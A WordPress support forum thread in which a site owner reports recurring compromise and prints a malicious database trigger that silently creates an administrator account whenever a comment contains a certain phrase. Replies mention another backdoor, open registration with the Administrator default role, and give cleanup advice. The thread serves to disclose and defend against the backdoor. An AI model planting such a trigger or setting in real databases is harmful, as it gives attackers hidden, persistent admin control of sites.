Re-Hacked via DB-Trigger

  • Resolved Chris

    (@bundfegadmin)


    2 years, 4 months ago

    Hi there,
    I just helped a friend with a hacked website. It was round 2, because we had removed the false-admin-account (wp-admin | [email protected] – seems to be a known hacker-account) and deleted/repaired all hacked files.
    When the account appeared again I looked deeper into everything.

    I found a trigger (name: after_insert_comment) in the database with the following code:

    BEGIN
     IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
         SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users);
         SET @nextWpUsersID = @lastInsertWpUsersId + 1;
         INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', '[email protected]', 'https://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
         INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
         INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
     END IF;
 END

    I found the same trigger in three databases in the same webspace and wonder in how many pages this trigger is waiting.
    Is there any way that wordfence could be able to find db-triggers and show them in the scan?

    PS: the pw-hash was the same in all triggers so bruteforcing it could be pretty interesting since you could get access to a lot of sites (I changed it just a bit ;-))

    • This topic was modified 2 years, 4 months ago by Chris. Reason: typo
    • This topic was modified 2 years, 4 months ago by Chris. Reason: grammar
Viewing 7 replies - 1 through 7 (of 7 total)
  • Thread Starter Chris

    (@bundfegadmin)

    PPS: Another backdoor I stumbled apon a few years ago, and wordfence could potentially warn about: In wordpress-settings “Membership – Anyone can register” was checked and “New User Default Role” was “Administrator”. I even think wordpress should prevent this setting in its core…

    Hey @bundfegadmin,

    Regarding your concern (second comment), you’re absolutely right.

    Your concern has already been presented to the WordPress Core Trac Team and is still active. For details, see WordPress Core Ticket No. 43936.

    Hope this helps.

    Cheerio!

    Plugin Support wfpeter

    (@wfpeter)

    Hi @bundfegadmin, thanks for the detailed information about what you’d had to fix in this case.

    I have mentioned this to our team and I believe a check for this specific malware is being discussed although I can’t provide ongoing updates here on the forums.

    I’ll just provide our site-cleaning documents below for reference just in case any checks have been missed or may help in future: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Make sure WordPress core and all of your plugins and themes are updated. Also, as the database triggers were affected in this case, update your passwords for the hosting control panel, FTP, WordPress admin users, and database.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.

    Thanks,

    Peter.

    Thread Starter Chris

    (@bundfegadmin)

    Hi folks,

    @generosus thanks for the post in the mentioned ticket. Are these times normal? That started 5 year ago. I am really not familiar with this community ??

    @wfpeter thanks for considering it. Good luck to your team. And thanks for the fine Learning Center. I will look into it ??

    Chris

    Hello everyone,

    I woke up yesterday to a site completely wiped from my bluehost hosting account. It had a generic database connection error per say but when my team restored deleted site I went in and saw bunch of [email protected] entries as the wpadmin.

    I went around to re-enable my wordfence which I don’t know why am paying for? I am not savvy with wordpress as much as with the datacenter infrastructure so looking for some advice as to how to minimize risk and what security solution you guys recommend.

    Cheers

    Zack

    @bundfegadmin we had a site hit with the same thing. Are you able to recall which database table(s) that SQL was injected in? Thx!

    Thread Starter Chris

    (@bundfegadmin)

    @wilrevehl: the code, I pasted in the first post, was from a “trigger” (acts automatically, when the conditions are met (in this case a new comment with specific content), not from a table. And it inserts data into wp_users and wp_usermeta (as you can see in lines 5-7).

    Was this your question? I am not sure ?? if not, perhaps you could rephrase it ??

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘Re-Hacked via DB-Trigger’ is closed to new replies.